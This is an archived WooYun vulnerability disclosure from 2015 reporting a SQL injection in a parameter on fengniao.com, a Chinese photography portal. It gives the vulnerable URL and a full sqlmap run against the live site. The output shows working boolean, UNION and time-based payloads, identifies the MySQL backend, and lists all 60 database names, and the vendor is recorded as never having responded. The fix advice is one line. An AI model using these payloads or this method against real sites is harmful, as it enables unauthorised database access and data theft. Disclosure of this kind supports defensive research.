当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110193

漏洞标题:中国第一影像门户蜂鸟网存在严重漏洞

相关厂商:fengniao.com

漏洞作者: IOT

提交时间:2015-04-25 01:00

修复时间:2015-06-09 01:02

公开时间:2015-06-09 01:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

求个邀请码呗。。。

详细说明:

注入点http://www.fengniao.com/active/20091123_interview/list.php?type=1
直接丢sqlmap跑

漏洞证明:

root@IOT:~# sqlmap -u "http://www.fengniao.com/active/20091123_interview/listhp?type=1"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150416}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:49:29
[19:49:29] [INFO] resuming back-end DBMS 'mysql'
[19:49:29] [INFO] testing connection to the target URL
[19:49:30] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=1 AND 5390=5390
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: type=1 UNION ALL SELECT CONCAT(0x717a707171,0x6547726e49505851525a,0x716b787a71),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: type=1 AND (SELECT * FROM (SELECT(SLEEP(5)))uXgO)
---
[19:49:30] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[19:49:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.fengniao.com'
[*] shutting down at 19:49:30
available databases [60]:
[*] 08dream_photo
[*] activity
[*] activity2
[*] advertise
[*] album
[*] baseuser
[*] blog
[*] camera
[*] canon
[*] channels
[*] cms
[*] cnet_cn
[*] company
[*] digishop
[*] digital_camera
[*] ecard
[*] f_zb
[*] fengniao
[*] fn_2008
[*] fn_ask
[*] fn_atools
[*] fn_cms
[*] fn_complain
[*] fn_exhibition
[*] fn_match
[*] fn_my
[*] fn_picture
[*] fn_product
[*] fn_shuo
[*] fn_shuo_content
[*] fn_special
[*] fn_tuan
[*] fn_wd
[*] fnmall
[*] fnmatch
[*] image
[*] info
[*] information_schema
[*] kingston
[*] kingston_pet
[*] kmr2
[*] misc
[*] model
[*] model09
[*] mysql
[*] news
[*] onlineshop
[*] photographer
[*] pic2dc
[*] product
[*] sample
[*] seagate
[*] survey
[*] survey_07
[*] tags
[*] talk
[*] test
[*] usedmarket
[*] valbum
[*] vbbrc2


修复方案:

过滤注入参数,添加防注入

版权声明:转载请注明来源 IOT@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)